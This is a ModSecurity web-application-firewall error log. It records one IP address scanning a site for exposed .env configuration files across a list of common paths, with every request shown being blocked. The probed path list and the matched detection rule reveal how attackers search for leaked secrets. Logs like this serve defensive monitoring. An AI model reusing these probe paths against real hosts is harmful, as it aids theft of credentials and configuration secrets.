[Sun Dec 07 06:14:30.743130 2025] [:error] [pid 573221] [client 195.178.110.108:47214] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/js/.env"] [unique_id "aTUNNlvgbiRUkefMDcyo7wAAAAM"]
[Sun Dec 07 06:14:35.803650 2025] [:error] [pid 573220] [client 195.178.110.108:47224] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/js/.env"] [unique_id "aTUNO6xAi-0-oAL0IKmU7QAAAAI"]
[Sun Dec 07 06:14:35.803882 2025] [:error] [pid 573220] [client 195.178.110.108:47224] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/js/.env"] [unique_id "aTUNO6xAi-0-oAL0IKmU7QAAAAI"]
[Sun Dec 07 06:14:35.804076 2025] [:error] [pid 573220] [client 195.178.110.108:47224] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/js/.env"] [unique_id "aTUNO6xAi-0-oAL0IKmU7QAAAAI"]
[Sun Dec 07 06:14:42.872658 2025] [:error] [pid 573218] [client 195.178.110.108:49058] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aTUNQv-86ve6IRoVOdG0TwAAAAA"]
[Sun Dec 07 06:14:42.872937 2025] [:error] [pid 573218] [client 195.178.110.108:49058] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aTUNQv-86ve6IRoVOdG0TwAAAAA"]
[Sun Dec 07 06:14:42.873150 2025] [:error] [pid 573218] [client 195.178.110.108:49058] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aTUNQv-86ve6IRoVOdG0TwAAAAA"]
[Sun Dec 07 06:14:50.531676 2025] [:error] [pid 575101] [client 195.178.110.108:48790] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aTUNSp5-xCwpsqJ5xa2MuQAAAAo"]
[Sun Dec 07 06:14:50.531911 2025] [:error] [pid 575101] [client 195.178.110.108:48790] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aTUNSp5-xCwpsqJ5xa2MuQAAAAo"]
[Sun Dec 07 06:14:50.532083 2025] [:error] [pid 575101] [client 195.178.110.108:48790] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aTUNSp5-xCwpsqJ5xa2MuQAAAAo"]
[Sun Dec 07 06:14:56.970403 2025] [:error] [pid 575098] [client 195.178.110.108:48792] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aTUNUMIyjLAtHsCAPK6j3QAAAAg"]
[Sun Dec 07 06:14:56.970647 2025] [:error] [pid 575098] [client 195.178.110.108:48792] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aTUNUMIyjLAtHsCAPK6j3QAAAAg"]
[Sun Dec 07 06:14:56.970823 2025] [:error] [pid 575098] [client 195.178.110.108:48792] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aTUNUMIyjLAtHsCAPK6j3QAAAAg"]
[Sun Dec 07 06:15:01.602204 2025] [:error] [pid 573222] [client 195.178.110.108:43138] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/core/.env"] [unique_id "aTUNVX-LlH4bdVGDXQ5iUQAAAAQ"]
[Sun Dec 07 06:15:01.602595 2025] [:error] [pid 573222] [client 195.178.110.108:43138] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/core/.env"] [unique_id "aTUNVX-LlH4bdVGDXQ5iUQAAAAQ"]
[Sun Dec 07 06:15:01.602842 2025] [:error] [pid 573222] [client 195.178.110.108:43138] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/core/.env"] [unique_id "aTUNVX-LlH4bdVGDXQ5iUQAAAAQ"]
[Sun Dec 07 06:15:06.979759 2025] [:error] [pid 573219] [client 195.178.110.108:43154] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/core/.env"] [unique_id "aTUNWjIIfFlI1ZI7Yt0cuAAAAAE"]
[Sun Dec 07 06:15:06.980026 2025] [:error] [pid 573219] [client 195.178.110.108:43154] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/core/.env"] [unique_id "aTUNWjIIfFlI1ZI7Yt0cuAAAAAE"]
[Sun Dec 07 06:15:06.980781 2025] [:error] [pid 573219] [client 195.178.110.108:43154] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/core/.env"] [unique_id "aTUNWjIIfFlI1ZI7Yt0cuAAAAAE"]
[Sun Dec 07 06:15:14.334131 2025] [:error] [pid 573221] [client 195.178.110.108:47456] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/core/.env"] [unique_id "aTUNYlvgbiRUkefMDcyo8AAAAAM"]
[Sun Dec 07 06:15:14.334397 2025] [:error] [pid 573221] [client 195.178.110.108:47456] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/core/.env"] [unique_id "aTUNYlvgbiRUkefMDcyo8AAAAAM"]
[Sun Dec 07 06:15:14.334582 2025] [:error] [pid 573221] [client 195.178.110.108:47456] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/core/.env"] [unique_id "aTUNYlvgbiRUkefMDcyo8AAAAAM"]
[Sun Dec 07 06:15:14.374383 2025] [:error] [pid 573221] [client 195.178.110.108:47456] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/mail/.env"] [unique_id "aTUNYlvgbiRUkefMDcyo8QAAAAM"]
[Sun Dec 07 06:15:14.374617 2025] [:error] [pid 573221] [client 195.178.110.108:47456] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/mail/.env"] [unique_id "aTUNYlvgbiRUkefMDcyo8QAAAAM"]
[Sun Dec 07 06:15:14.374813 2025] [:error] [pid 573221] [client 195.178.110.108:47456] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/mail/.env"] [unique_id "aTUNYlvgbiRUkefMDcyo8QAAAAM"]
[Sun Dec 07 06:15:14.414202 2025] [:error] [pid 573221] [client 195.178.110.108:47456] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/mailer/.env"] [unique_id "aTUNYlvgbiRUkefMDcyo8gAAAAM"]
[Sun Dec 07 06:15:14.414456 2025] [:error] [pid 573221] [client 195.178.110.108:47456] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/mailer/.env"] [unique_id "aTUNYlvgbiRUkefMDcyo8gAAAAM"]
[Sun Dec 07 06:15:14.414676 2025] [:error] [pid 573221] [client 195.178.110.108:47456] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/mailer/.env"] [unique_id "aTUNYlvgbiRUkefMDcyo8gAAAAM"]
[Sun Dec 07 06:15:14.563261 2025] [:error] [pid 575091] [client 195.178.110.108:47472] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/nginx/.env"] [unique_id "aTUNYhJQiyL0bOqNK0sWvgAAAAc"]
[Sun Dec 07 06:15:14.563494 2025] [:error] [pid 575091] [client 195.178.110.108:47472] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/nginx/.env"] [unique_id "aTUNYhJQiyL0bOqNK0sWvgAAAAc"]
[Sun Dec 07 06:15:14.563674 2025] [:error] [pid 575091] [client 195.178.110.108:47472] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/nginx/.env"] [unique_id "aTUNYhJQiyL0bOqNK0sWvgAAAAc"]
[Sun Dec 07 06:15:14.598204 2025] [:error] [pid 575091] [client 195.178.110.108:47472] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aTUNYhJQiyL0bOqNK0sWvwAAAAc"]
[Sun Dec 07 06:15:14.598464 2025] [:error] [pid 575091] [client 195.178.110.108:47472] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aTUNYhJQiyL0bOqNK0sWvwAAAAc"]
[Sun Dec 07 06:15:14.598650 2025] [:error] [pid 575091] [client 195.178.110.108:47472] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aTUNYhJQiyL0bOqNK0sWvwAAAAc"]
[Sun Dec 07 06:15:14.646508 2025] [:error] [pid 575091] [client 195.178.110.108:47472] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aTUNYhJQiyL0bOqNK0sWwAAAAAc"]
[Sun Dec 07 06:15:14.646764 2025] [:error] [pid 575091] [client 195.178.110.108:47472] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aTUNYhJQiyL0bOqNK0sWwAAAAAc"]
[Sun Dec 07 06:15:14.646972 2025] [:error] [pid 575091] [client 195.178.110.108:47472] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aTUNYhJQiyL0bOqNK0sWwAAAAAc"]
[Sun Dec 07 06:15:14.795916 2025] [:error] [pid 573220] [client 195.178.110.108:47484] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/xampp/.env"] [unique_id "aTUNYqxAi-0-oAL0IKmU7gAAAAI"]
[Sun Dec 07 06:15:14.796142 2025] [:error] [pid 573220] [client 195.178.110.108:47484] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/xampp/.env"] [unique_id "aTUNYqxAi-0-oAL0IKmU7gAAAAI"]
[Sun Dec 07 06:15:14.796317 2025] [:error] [pid 573220] [client 195.178.110.108:47484] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/xampp/.env"] [unique_id "aTUNYqxAi-0-oAL0IKmU7gAAAAI"]
